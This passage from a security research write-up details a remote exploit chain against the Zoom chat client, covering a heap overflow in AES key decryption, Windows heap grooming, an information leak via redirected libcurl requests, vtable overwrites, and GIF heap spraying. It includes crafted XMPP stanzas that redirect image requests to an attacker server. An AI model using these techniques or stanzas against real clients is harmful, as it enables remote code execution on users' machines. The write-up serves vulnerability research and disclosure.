      <scid>tJKVTqrloavxzawxMZ9Kk0Dak3LaDPKKNb+vcAqMztQ=</scid>
      <recv>[email protected]</recv>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="RequestKey">
      <xkey>
        <pub_cert>MIICcjCCAVqgAwIBAgIBCjANBgkqhkiG9w0BAQsFADA3MSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxEjAQBgNVBAMMCSouem9vbS51czAeFw0yMTA0MDIxMjAzNDVaFw0yMjA0MDIxMjMzNDVaMEoxLDAqBgNVBAMMI2VrM19mZHZ5dHFnbTB6emxtY25kZ2FAeG1wcC56b29tLnVzMQ0wCwYDVQQKEwRaT09NMQswCQYDVQQGEwJVUzCBmzAQBgcqhkjOPQIBBgUrgQQAIwOBhgAEAa5LZ0vdjfjTDbPnuK2Pj1WKRaBee0QoAUQ281Z+uG4Ui58+QBSfWVVWCrG/8R4KTPvhS7/utzNIe+5R8oE69EPFAFNBMe/nCugYfi/EzEtwzor/x1R6sE10rIBGwFwKNSnzxtwDbiFmjpWFFV7TAdT/wr/f1E1ZkVR4ooitgVwGfREVMA0GCSqGSIb3DQEBCwUAA4IBAQAbtx2A+A956elf/eGtF53iQv2PT9I/4SNMIcX5Oe/sJrH1czcTfpMIACpfbc9Iu6n/WNCJK/tmvOmdnFDk2ekDt9jeVmDhwJj2pG+cOdY/0A+5s2E5sFTlBjDmrTB85U4xw8ahiH9FQTvj0J4FJCAPsqn0v6D87auA8K6w13BisZfDH2pQfuviJSfJUOnIPAY5+/uulaUlee2HQ1CZAhFzbBjF9R2LY7oVmfLgn/qbxJ6eFAauhkjn1PMlXEuVHAap1YRD8Y/xZRkyDFGoc9qZQEVj6HygMRklY9xUnaYWgrb9ZlCUaRefLVT3/6J21g6G6eDRtWvE1nMfmyOvTtjC</pub_cert>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <v2data action="None"/>
    <app v="0"/>
  </ze2e>
  <zmtask feature="50"/>
</message>
  1. The sender responds to the RequestKey message with a ResponseKey message. This contains the sender’s X509 certificate in <pub_cert>, an <encoded> XML element, which contains the message key encrypted using both the sender’s private key and the recipient’s public key, and a signature in <signature>.
<message from="[email protected]/ZoomChat_pc" to="[email protected]" id="4D6D109E-2AF2-4444-A6FD-55E26F6AB3F0" type="chat">
  <thread>gloox{24A77779-3F77-414B-8BC7-E162C1F3BDDF}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
      <scid>{01F97500-AC12-4F49-B3E3-628C25DC364E}</scid>
      <recv>[email protected]</recv>
      <rres>ZoomChat_pc</rres>
      <rcid>tJKVTqrloavxzawxMZ9Kk0Dak3LaDPKKNb+vcAqMztQ=</rcid>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="ResponseKey">
      <xkey create_time="1617394606">
        <pub_cert>MIICcjCCAVqgAwIBAgIBCjANBgkqhkiG9w0BAQsFADA3MSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxEjAQBgNVBAMMCSouem9vbS51czAeFw0yMTAyMTgxOTIzMjJaFw0yMjAyMTgxOTUzMjJaMEoxLDAqBgNVBAMMI2V3Y2psbmlfcndjamF5Z210cHZuZXdAeG1wcC56b29tLnVzMQ0wCwYDVQQKEwRaT09NMQswCQYDVQQGEwJVUzCBmzAQBgcqhkjOPQIBBgUrgQQAIwOBhgAEAPyPYr49WDKcwh2dc1V1GMv5whVyLaC0G/CzsvJXtSoSRouPaRBloBBlay2JpbYiZIrEBek3ONSzRd2Co1WouqXpASo2ADI/+qz3OJiOy/e4ccNzGtCDZTJHWuNVCjlV3abKX8smSDZyXc6eGP72p/xE96h80TLWpqoZHl1Ov+JiSVN/MA0GCSqGSIb3DQEBCwUAA4IBAQCUu+e8Bp9Qg/L2Kd/+AzYkmWeLw60QNVOw27rBLytiH6Ff/OmhZwwLoUbj0j3JATk/FiBpqyN6rMzL/TllWf+6oWT0ZqgdtDkYvjHWI6snTDdN60qHl77dle0Ah+VYS3VehqtqnEhy3oLiP3pGgFUcxloM85BhNGd0YMJkro+mkjvrmRGDu0cAovKrSXtqdXoQdZN1JdvSXfS2Otw/C2x+5oRB5/03aDS8Dw+A5zhCdFZlH4WKzmuWorHoHVMS1AVtfZoF0zHfxp8jpt5igdw/rFZzDxtPnivBqTKgCMSaWE5HJn9JhupHisoJUipGD8mvkxsWqYUUEI2GDauGw893</pub_cert>
        <encoded>...</encoded>
        <signature>MIGHAkIBaq/VH7MvCMnMcY+Eh6W4CN7NozmcXrRSkJJymvec+E5yWqF340QDNY1AjYJ3oc34ljLoxy7JeVjop2s9k1ZPR7cCQWnXQAViihYJyboXmPYTi0jRmmpBn61OkzD6PlAqAq1fyc8e6+e1bPsu9lwF4GkgI40NrPG/kbUx4RbiTp+Ckyo0</signature>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <app v="0"/>
  </ze2e>
  <zmtask feature="50"/>
  <zmext t="1617394613961">
    <from n="John Doe" e="[email protected]" res="ZoomChat_pc"/>
    <to/>
    <visible>false</visible>
  </zmext>
</message>

The way the key is encrypted has two options, depending on the type of key used by the recipient’s certificate. If it uses a RSA key, then the sender encrypts the message key using the public key of the recipient and signs it using their own private RSA key.

The default, however, is not to use RSA but to use an elliptic curve key using the curve P-521. Algorithms for encryption using elliptic curve keys do not exist (as far as we know). So instead of encrypting directly, elliptic curve Diffie-Helman is used using both users’ keys to obtain a shared secret. The shared secret is split into a key and IV to encrypt the message key data with AES. This is a common approach for encrypting data when using elliptic curve cryptography.

When handling a ResponseKey message, a std::string of a fixed size of 1024 bytes was allocated for the decrypted result. When decrypting using RSA, it was properly validated that the decryption result would fit in that buffer. When decrypting using AES, however, that check was missing. This meant that by sending a ResponseKey message with an AES-encrypted <encoded> element of more than 1024 bytes, it was possible to overflow a heap buffer.

The following snippet shows the function where the overflow happens. This is the SDK version, so with the logging available. Here, param_1[0] is the input buffer, param_1[1] is the input buffer’s length, param_1[2] is the output buffer and param_1[3] the output buffer length. This is a large snippet, but the important part of this function is that param_1[3] is only written to with the resulting length, it is not read first. The actual allocation of the buffer happens in a function a few steps earlier.

undefined4 __fastcall AESDecode(undefined4 *param_1, undefined4 *param_2) {
  char cVar1;
  int iVar2;
  undefined4 uVar3;
  int iVar4;
  LogMessage *this;
  int extraout_EDX;
  int iVar5;
  LogMessage local_180 [176];
  LogMessage local_d0 [176];
  int local_20;
  undefined4 *local_1c;
  int local_18;
  int local_14;
  undefined4 local_8;
  undefined4 uStack4;
  
  uStack4 = 0x170;
  local_8 = 0x101ba696;
  iVar5 = 0;
  local_14 = 0;
  local_1c = param_2;
  cVar1 = FUN_101ba34a();

  if (cVar1 == '\0') {
    return 1;
  }

  if ((*(uint *)(extraout_EDX + 4) < 0x20) || (*(uint *)(extraout_EDX + 0xc) < 0x10)) {
    iVar5 = logging::GetMinLogLevel();
    
    if (iVar5 < 2) {
      logging::LogMessage::LogMessage
                (local_d0, "c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1d6, 1);
      local_8 = 0;
      local_14 = 1;
      uVar3 = log_message(iVar5 + 8, "[AESDecode] Failed. Key len or IV len is incorrect.", " ");
      log_message(uVar3);
      logging::LogMessage::~LogMessage(local_d0);

      return 1;
    }

    return 1;
  }

  local_14 = param_1[2];
  local_18 = 0;
  iVar2 = EVP_CIPHER_CTX_new();

  if (iVar2 == 0) {
    return 0xc;
  }

  local_20 = iVar2;
  EVP_CIPHER_CTX_reset(iVar2);
  uVar3 = EVP_aes_256_cbc(0, *local_1c, local_1c[2], 0);
  iVar4 = EVP_CipherInit_ex(iVar2, uVar3);

  if (iVar4 < 1) {
    iVar2 = logging::GetMinLogLevel();

    if (iVar2 < 2) {
      logging::LogMessage::LogMessage
                (local_d0,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1e8, 1);
      iVar5 = 2;
      local_8 = 1;
      local_14 = 2;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherInit_ex Failed.", " ");
      log_message(uVar3);
    }
LAB_101ba758:
    if (iVar5 == 0) goto LAB_101ba852;
    this = local_d0;
  } else {
    iVar4 = EVP_CipherUpdate(iVar2, local_14, &local_18, *param_1, param_1[1]);

    if (iVar4 < 1) {
      iVar2 = logging::GetMinLogLevel();

      if (iVar2 < 2) {
        logging::LogMessage::LogMessage
                  (local_d0,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                  0x1f0, 1);
        iVar5 = 4;
        local_8 = 2;
        local_14 = 4;
        uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherUpdate Failed.", " ");
        log_message(uVar3);
      }
      goto LAB_101ba758;
    }

    param_1[3] = local_18;
    iVar4 = EVP_CipherFinal_ex(iVar2, local_14 + local_18, &local_18);

    if (0 < iVar4) {
      param_1[3] = param_1[3] + local_18;
      EVP_CIPHER_CTX_free(iVar2);
      return 0;
    }

    iVar2 = logging::GetMinLogLevel();
    if (iVar2 < 2) {
      logging::LogMessage::LogMessage
                (local_180,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1fb, 1);
      iVar5 = 8;
      local_8 = 3;
      local_14 = 8;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherFinal_ex Failed.", " ");
      log_message(uVar3);
    }

    if (iVar5 == 0) goto LAB_101ba852;
    this = local_180;
  }
  
  logging::LogMessage::~LogMessage(this);
LAB_101ba852:
  EVP_CIPHER_CTX_free(local_20);
  return 0xc;
}

Side note: we don’t know the format of what the <encoded> element would normally contain after decryption, but from our understanding of the protocol we assume it contains a key. It was easy to initiate the old version of the protocol against a new client. But to have a legitimate client initiate requires an old version of the client, which appears to be malfunctioning (it can no longer log in).

We were about 2 weeks into our research and we had found a buffer overflow we could trigger remotely without user interaction by sending a few chat messages to a user who had previously accepted external contact request or is currently in the same multi-user chat. This was looking promising.

Step 6: Path to exploitation

To build an exploit around it, it is good to first mention some pros and cons of this buffer overflow:

  • Pro: The size is not directly bounded (implicitly by the maximum size of an XMPP packet, but in practice this is way more than needed).
  • Pro: The contents are the result of decrypting the buffer, so this can be arbitrary binary data, not limited to printable or non-zero characters.
  • Pro: It triggers automatically without user interaction (as long as the attacker and victim are contacts).
  • Con: The size must be a multiple of the AES block size, 16 bytes. There can be padding at the end, but even when padding is present it will still overwrite the data up to a full block before removing the padding.
  • Con: The heap allocation is of a fixed (and quite large) size: 1040 bytes. (The backing buffer of a std::string on Windows has up to 16 extra bytes for some reason.)
  • Con: The buffer is allocated and then while handling the same packet used for the overflow. We can not place the buffer first, allocate something else and then overflow.

We did not yet have a full plan for how to exploit this, but we expected that we would most likely need to overwrite a function pointer or vtable in an object. We already knew OpenSSL was used, and it uses function pointers within structs extensively. We could even create a few already during the later handling of ResponseKey messages. We investigated this, but it quickly turned out to be impossible due to the heap allocator in use.

Step 7: Understanding the Windows heap allocator

To implement our exploit, we needed to fully understand how the heap allocator in Windows places allocations. Windows 10 includes two different heap allocators: the NT heap and the Segment Heap. The Segment Heap is new in Windows 10 and only used for specific applications, which don’t include Zoom, so the NT Heap was what is used. The NT Heap has two different allocators (for allocations less than about 16 kB): the front-end allocator (known as the Low-Fragment Heap or LFH) and the back-end allocator.

Before we go into detail for how those two allocators work, we’ll introduce some definitions:

  • Block: a memory area which can be returned by the allocator, either in use or not.
  • Bucket: a group of blocks handled by the LFH.
  • Page: a memory area assigned by the OS to a process.

By default, the back-end allocator handles all allocations. The best way to imagine the back-end allocator is as a sorted list of all free blocks (the freelist). Whenever an allocation request is received for a specific size, the list is traversed until a block is found of at least the requested size. This block is removed from the list and returned. If the block was bigger than the requested size, then it is split and the remainder is inserted in the list again. If no suitable blocks are present, the heap is extended by requesting a new page from the OS, inserting it as a new block at the appropriate location in the list. When an allocation is freed, the allocator first checks if the blocks before and after it are also free. If one or both of them are then those are merged together. The block is inserted into the list again at the location matching its size.

The following video shows how the allocator searches for a block of a specific size (orange), returns it and places the remainder back into the list (green).

The back-end allocator is fully deterministic: if you know the state of the freelist at a certain time and the sequence of allocations and frees that follow, then you can determine the new state of the list. There are some other useful properties too, such as that allocations of a specific size are last-in-first-out: if you allocate a block, free it and immediately allocate the same size, then you will always receive the same address.

The front-end allocator, or LFH, is used for allocations for sizes that are used often to reduce the amount of fragmentation. If more than 17 blocks of a specific size range are allocated and still in use, then the LFH will start handling that specific size from then on. LFH allocations are grouped in buckets each handling a range of allocation sizes. When a request for a specific size is received, the LFH checks the bucket most recently used for an allocation of that size if it still has room. If it does not, it checks if there are any other buckets for that size range with available room. If there are none, a new bucket is created.

No matter if the LFH or back-end allocator is used, each heap allocation (of less than 16 kB) has a header of eight bytes. The first four bytes are encoded, the next four are not. The encoding uses a XOR with a random key, which is used as a security measure against buffer overflows corrupting heap metadata.

For exploiting a heap overflow there are a number of things to consider. The back-end allocator can create adjacent allocations of arbitrary sizes. On the LFH, only objects in the same range are combined in a bucket, so to overwrite a block from a different range you would have to make sure two buckets are placed adjacent. In addition, which free slot from a bucket is used is randomized.

For these reasons we focused initially on the back-end allocator. We quickly realized we couldn’t use any of the OpenSSL objects we found previously: when we launch Zoom in a clean state (no existing chat history), all sizes up to around 700 bytes (and many common sizes above it too) would already be handled by the LFH. It is impossible to switch a specific size back from the LFH to the back-end allocator. Therefore, the OpenSSL objects we identified initially would be impossible to allocate after our overflowing block, as they were all less than 700 bytes so guaranteed to be placed in a LFH bucket.

This meant we had to search more thoroughly for objects of larger sizes in which we might be able to overwrite a function pointer or vtable. We found that one of the other DLL’s, zWebService.dll, includes a copy of libcurl, which gave us some extra source code to analyze. Analyzing source code was much more efficient than having to obtain information about a C++ object’s layout from a decompiler. This did give us some interesting objects to overflow that would not automatically be on the LFH.

Step 8: Heap grooming

In order to place our allocations, we would need to do some extensive heap grooming. We assumed we needed to follow the following procedure:

  1. Allocate a temporary object of 1040 bytes.
  2. Allocate the object we want to overwrite after it.
  3. Free the object of 1040 bytes.
  4. Perform the overflow, hopefully at the same address as the 1040 byte object.

In order to do this, we had to be able to make an allocation of 1040 bytes which we could free at a precise later time. But even more importantly, for this to work we would also need to fill up many holes in the freelist so our two objects would end up adjacent. If we want to allocate the objects directly adjacent, then in the first step there needs to be a free block of size 1040 + x, with x the size of the other object. But this means that there must not be any other allocations of size between 1040 and 1040 + x, otherwise that block would be used instead. This means there is a pretty large range of sizes for which there must not be any free blocks available.

To make arbitrary sized allocations, we stayed close to what we already knew. As we mentioned, if you send an encrypted message with a key identifier the other user does not yet have, then it will request that key. We noticed that this key identifier remained in a std::string in memory, likely because it was waiting for a response. It could be an arbitrary large size, so we had a way to make an allocation. It is also possible to revoke chat messages in Zoom, which would also free the pending key request. This gave us a primitive for allocating and freeing a specific size block, but it was quite crude: it would always allocate 2 copies of that string (for some reason), and in order to handle a new incoming message it would make quite a few temporary copies.

We spent a lot of time making allocations by sending messages and monitoring the state of the freelist. For this, we wrote some Frida scripts for tracking allocations, printing the freelist and checking the LFH status. These things can all be done by WinDBG, but we found it way too slow to be of use. There was one nice trick we could use: if specific allocations could get in the way of our heap grooming, then we could trigger the LFH for that size to make sure it would no longer affect the freelist by making the client perform at least 17 allocations of that size.

We spent a lot of time on this, but we ran into a problem. Sometimes, randomly, our allocation of 1040 bytes would already be placed on the LFH, even if we launched the application in a clean state. At first, we accepted this risk: a chance of around 25% to fail is still quite acceptable for the 3 attempts in Pwn2Own. But the more concrete our grooming became, the more additional objects and sizes we needed to use, such as for the objects from libcurl we might want to overwrite. With more sizes, it would get more and more likely that at least of one of them would be handled by the LFH already, completely breaking our exploit. We weren’t very keen on participating with a exploit that had already failed 75% of the time by the time the application had finished launching. We had spent a few weeks on trying to gain control over this, but eventually decided to try something else.

Step 9: To the LFH

We decided to investigate how easy it would be to perform our exploit if we forced the allocation we could overflow to the LFH, using the same method of forcing a size to the LFH first. This meant we had to search more thoroughly for objects of appropriate sizes. The allocation of 1040 bytes is placed in a bucket with all LFH allocations of 1025 bytes to 1088 bytes.

Before we go further, lets look at what defensive measures we had to deal with:

  • ASLR (Address Space Layout Randomization). This means that DLL’s are loaded in random locations and the location of the heap and stack are also randomized. However, because Zoom was a 32-bit application, there is not a very large range of possible addresses for DLL’s and for the heap.
  • DEP (Data Execution Prevention). This meant that there were no memory pages present that were both writable and executable.
  • CFG (Control Flow Guard). This is a relatively new technique that is used to check that function pointers and other dynamic addresses point to a valid start location of a function.

We noticed that ASLR and DEP were used correctly by Zoom, but the use of CFG had a weakness: the 2 OpenSSL DLL’s did not have CFG enabled due to an incompatibility in OpenSSL, which was very helpful for us.

CFG works by inserting a check (guard_check_icall) before all dynamic function calls which looks up the address that is about to be called in a list of valid function start addresses. If it is valid, the call is allowed. If not, an exception is raised.

Not enabling CFG for a dll means two things:

  • Any dynamic function call by this library does not check if the address is a function start location. In other words, guard_check_icall is not inserted.
  • Any dynamic function call from another library which does use CFG which calls an address in these dlls is always allowed. The valid start location list is not present for these dlls, which means that it allows all addresses in the range of that dll.

Based on this, we formed the following plan:

  1. Leak an address from one of the two OpenSSL DLL’s to deal with ASLR.
  2. Overflow a vtable or function pointer to point to a location in the DLL we have located.
  3. Use a ROP chain to gain arbitrary code execution.

To perform our buffer overflow on the LFH, we needed a way to deal with the randomization. While not perfect, one way we avoided a lot of crashes was to create a lot of new allocations in the size range and then freeing all but the last one. As we mentioned, the LFH returns a random free slot from the current bucket. If the current bucket is full, it looks if there are other not yet full buckets of the same size range. If there are none, the heap is extended and a new bucket is created.

By allocating many new blocks, we guaranteed that all buckets for this size range were full and we got a new bucket. Freeing a number of these allocations, but keeping the last block meant we had a lot of room in this bucket. As long as we didn’t allocate more blocks than would fit, all allocations of our size range would come from here. This was very helpful for reducing the chance of overwriting other objects that happen to fall in the same size range.

The following video shows the “dangerous” objects we don’t want to overwrite in orange, and the safe objects we created in green:

As long as Bucket 3 didn’t fill up completely, all allocations for the targeted size range would happen in that bucket, allowing us to avoid overwriting the orange objects. So long as no new “orange” objects were created, we could freely try again and again. The randomization would actually help us ensure that we would eventually obtain the object layout we wanted.

Step 10: Info leak

Turning a buffer overflow into an information leak is quite a challenge, as it depends heavily on the functionality which is available in the application. Common ways would be to allocate something which has a length field, overflow over the length field and then read the field. This did not work for us: we did not find any available functionality in Zoom to send something with an allocation of 1025-1088 with a length field and with a way to request it again. It is possible that it does exist, but analyzing the object layout of the C++ objects was a slow process.

We took a good look at the parts we had code for, and we found a method, although it was tricky.

When libcurl is used to request a URL it will parse and encode the URL and copy the relevant fields into an internal structure. The path and query components of the URL are stored in different, heap allocated blocks with a zero-terminator. Any required URL encoding will already have taken place, so when the request is sent the entire string is copied to the socket until it gets to the first null-byte.

We had found a way to initiate HTTPS requests to a server we control. The method was by sending a weird combination of two stanzas Zoom would normally use, one for sending an invitation to add a user and one notifying the user that a new bot was added to their account. A string from the stanza is then appended to a domain to download an image. However, the string of the prepended domain does not end with a /, so it is possible to extend it to end up at a different domain.

A stanza for requesting another user to be added to your contact list:

<presence xmlns="jabber:client" type="subscribe" email="[email of other user]" from="[email protected]/ZoomChat_pc">
  <status>{"e":"[email protected]","screenname":"John Doe","t":1617178959313}</status>
</presence>

The stanza informing a user that a new bot (in this case, SurveyMonkey) was added to their account:

<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc" type="probe">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:1">
    <members>
      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url="https://marketplacecontent.zoom.us//CSKvJMq_RlSOESfMvUk- dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url="//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>
    </members>
  </zoom>
</presence>

While a client only expects this stanza from the server, it is possible to send it from a different user account. It is then handled if the sender is not yet in the user’s contact list. So combining these two things, we ended up with the following:

<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:0">
    <members>
      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url="https://marketplacecontent.zoom.us//CSKvJMq_RlSOESfMvUk- dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url="example.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>
    </members>
  </zoom>
</presence>

The pic_url attribute here is ignored. Instead, the pic_relative_url attribute is used, with "https://marketplacecontent.zoom.us" prepended to it. This means a request is performed to:

"https://marketplacecontent.zoom.us" + image
"https://marketplacecontent.zoom.us" + "example.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"
"https://marketplacecontent.zoom.usexample.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF- vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png"

Because this is not restricted to subdomains of zoom.us, we could redirect it to a server we control.

We are still not fully sure why this worked, but it worked. This is one of two additional, low impact bugs we used for our attack and which is also currently fixed according to the Zoom Security Bulletin. On its own, this could be used to obtain the external IP address of another user if they are signed in to Zoom, even when you are not a contact.

Setting up a direct connection was very helpful for us, because we had much more control over this connection than over the XMPP connection. The XMPP connection is not direct, but through the server. This meant that invalid XML would not reach us. As the addresses we wanted to leak was unlikely to consist of entirely printable characters, we couldn’t try to get these included in a stanza that would reach us. With a direct connection, we were not restricted in any way.

Our plan was to do the following:

  1. Initiate a HTTPS request using a URL with a query part of 1087 bytes to a server we control.
  2. Accept the connection, but delay responding to the TLS handshake.
  3. Trigger the buffer overflow such that the buffer we overflow is immediately before the block containing the query part of the URL. This overwrites the heap header of the query block, the entire query (including the zero-terminator at the end) and the next heap header.
  4. Let the TLS handshake proceed.
  5. Receive the query, with the heap header and start of the next block in the HTTP request.

This video illustrates how this works:

In essence, this similar to creating an object, overwriting a length field and reading it. Instead of a counter for the length, we overwrite the zero-terminator of a string by writing all the way over the contents of a buffer.

This allowed us to leak data from the start of the next block up to the first null-byte in it. Conveniently, we had also found an interesting object to place there in the source of OpenSSL, libcrypto-1_1.dll to be specific. TLS1_PRF_PKEY_CTX is an object which is used during a TLS handshake to verify a MAC of the transcript during a handshake, to make sure an active attacker has not changed anything during the handshake. This struct starts with a pointer to another structure inside the same DLL (a static structure for a hashing function).

typedef struct {
    /* Digest to use for PRF */
    const EVP_MD *md;
    /* Secret value to use for PRF */
    unsigned char *sec;
    size_t seclen;
    /* Buffer of concatenated seed data */
    unsigned char seed[TLS1_PRF_MAXBUF];
    size_t seedlen;
} TLS1_PRF_PKEY_CTX;

There is one downside to this object: it is created, used and deallocated within one function call. But luckily, OpenSSL does not clear the full contents of the object, so the pointer at the start remains in the deallocated block:

static void pkey_tls1_prf_cleanup(EVP_PKEY_CTX *ctx)
{
    TLS1_PRF_PKEY_CTX *kctx = ctx->data;
    OPENSSL_clear_free(kctx->sec, kctx->seclen);
    OPENSSL_cleanse(kctx->seed, kctx->seedlen);
    OPENSSL_free(kctx);
}

This means that we could leak the pointer we want, but in order to do so we would need to place three objects just right. We needed to place 3 blocks in the right order in a bucket: the block we overflow, the query part of a URL for our initiated HTTPS request and a deallocated TLS1_PRF_PKEY_CTX object. One common way for defeating heap randomization in exploits is to just allocate a lot of objects and try often, but it’s not that simple in this case: we need enough objects and overflows to have a chance of success, but also not too many to still allow deallocated TLS1_PRF_PKEY_CTX objects to remain. If we allocated too many queries, no TLS1_PRF_PKEY_CTX objects would be left. This was a difficult balance to hit.

We tried this a lot and it took days, but eventually we leaked the address once. Then, a few days later, it worked again. And then again the same day. Slowly we were finding the right balance of the number of objects, connections and overflows.

The @z\x15p (0x70157a40) here is the leaked address in libcrypto-1_1.dll:

One thing that greatly increased the chances of success was to use TLS renegotiation. The TLS1_PRF_PKEY_CTX object is created during a handshake, but setting up new connections takes time and does a lot of allocations that could disturb our heap bucket. We found that we could also set up a connection and use TLS renegotiation repeatedly, which meant that the handshake was performed again but nothing else. OpenSSL supports renegotation, and even if you want to renegotiate thousands of times without ever sending a HTTP response this is entirely fine. We ended up creating 3 connections to a webserver that was doing nothing other than constantly renegotiating. This allowed us to create a constant stream of new deallocated TLS1_PRF_PKEY_CTX objects in the deallocated space in the bucket.

The info leak did however remain the most unstable part of our exploit. If you watch the video of our exploit back, then the longest delay will be waiting for the info leak. Vincent from ZDI mentions when the info leak happens during the second attempt. As you can see, the rest of the exploit completes quite quickly after that.

Step 11: Control

The next step was to find an object where we could overwrite a vtable or function pointer. Here, again, we found a useful open source component in a DLL. The file viper.dll contains a copy of the WebRTC library from around 2012. Initially, we found that when a call invite is received (even if it is not answered), viper.dll creates 5 objects of 1064 bytes which all start with a vtable. By searching the WebRTC source code we found that these were FileWrapperImpl objects. These can be seen as adding a C++ API around FILE * pointers from C: methods for writing and reading data, automatic closing and flushing in the destructor, etc. There was one downside: these 5 objects were doing nothing. If we overwrote their vtable in the debugger, nothing would happen until we exited Zoom, only then the destructor would call some vtable functions.

class FileWrapperImpl : public FileWrapper {
 public:
  FileWrapperImpl();
  ~FileWrapperImpl() override;

  int FileName(char* file_name_utf8, size_t size) const override;

  bool Open() const override;

  int OpenFile(const char* file_name_utf8,
               bool read_only,
               bool loop = false,
               bool text = false) override;

  int OpenFromFileHandle(FILE* handle,
                         bool manage_file,
                         bool read_only,
                         bool loop = false) override;

  int CloseFile() override;
  int SetMaxFileSize(size_t bytes) override;
  int Flush() override;

  int Read(void* buf, size_t length) override;
  bool Write(const void* buf, size_t length) override;
  int WriteText(const char* format, ...) override;
  int Rewind() override;

 private:
  int CloseFileImpl();
  int FlushImpl();

  std::unique_ptr<RWLockWrapper> rw_lock_;

  FILE* id_;
  bool managed_file_handle_;
  bool open_;
  bool looping_;
  bool read_only_;
  size_t max_size_in_bytes_;  // -1 indicates file size limitation is off
  size_t size_in_bytes_;
  char file_name_utf8_[kMaxFileNameSize];
};

Code execution at exit was far from ideal: this would mean we had just one shot in each attempt. If we had failed to overwrite a vtable we would have no chance to try again. We also did not have a way to remotely trigger a clean exit, but even if we had, the chance we could exit successfully were small. The information leak will have corrupted many objects and heap metadata in the previous phase, which maybe didn’t affect anything yet if those objects are unused, but if we tried to exit could cause a crash due to destructors or freeing.

Based on the WebRTC source code, we noticed the FileWrapperImpl objects are often used in classes related to audio playback. As it happens, the Windows VM Thijs was using at that time did not have an emulated sound card. There was no need for one, as we were not looking at exploiting the actual meeting functionality. Daan suggested to add one, because it could matter for these objects. Thijs was skeptical, but security involves trying a lot of things you don’t expect to work, so he added one. After this, the creation of FileWrapperImpls had indeed changed significantly.

With a emulated sound card, new FileWrapperImpls were created and destroyed regularly while the call was ringing. Each loop of the jingle seemed to trigger a number of allocations and frees of these objects. It is a shame the videos we have of the exploit do not have sound: you would have heard the ringing sound complete a couple of full loops at the moment it exits and calc is started.

This meant we had a vtable pointer we could overwrite quite reliably, but now the question is: what to write there?

Step 12: GIPHY time

We had obtained the offset of libcrypto-1_1.dll using our information leak, but we also needed an address of data under our control: if we overwrite a vtable pointer, then it needs to point to an area containing one or more function pointers. ASLR means we don’t know for sure where our heap allocations end up. To deal with this, we used GIFs.

Hack the planet GIPHY

To send an out-of-meeting message in Zoom, the receiving user has to have previously accepted a connect request or be in a multi-user chat with the attacker. If a user is able to send a message with an image to another user in Zoom, then that image is downloaded and shown automatically if it is below a few megabytes. If it is larger, the user needs to click on it to download it.

In the Zoom chat client, it is also possible to send GIFs from GIPHY. For these images, the file size restriction is not applied and the files are always downloaded and shown. User uploads and GIPHY files are both downloaded from the same domain, but using different paths. By sending an XMPP message for sending a GIPHY, but using path traversal to point it to a user uploaded GIF file instead, we found that we could allow the downloading of arbitrary sized GIF files. If the file is a valid GIF file, then it is loaded into memory. If we send the same link again then it is not downloaded twice, but a new copy is allocated in memory. This is the second low impact vulnerability we used, which is also fixed according to the Zoom Security Bulletin.

A normal GIPHY message:

<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc">
  <body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body>
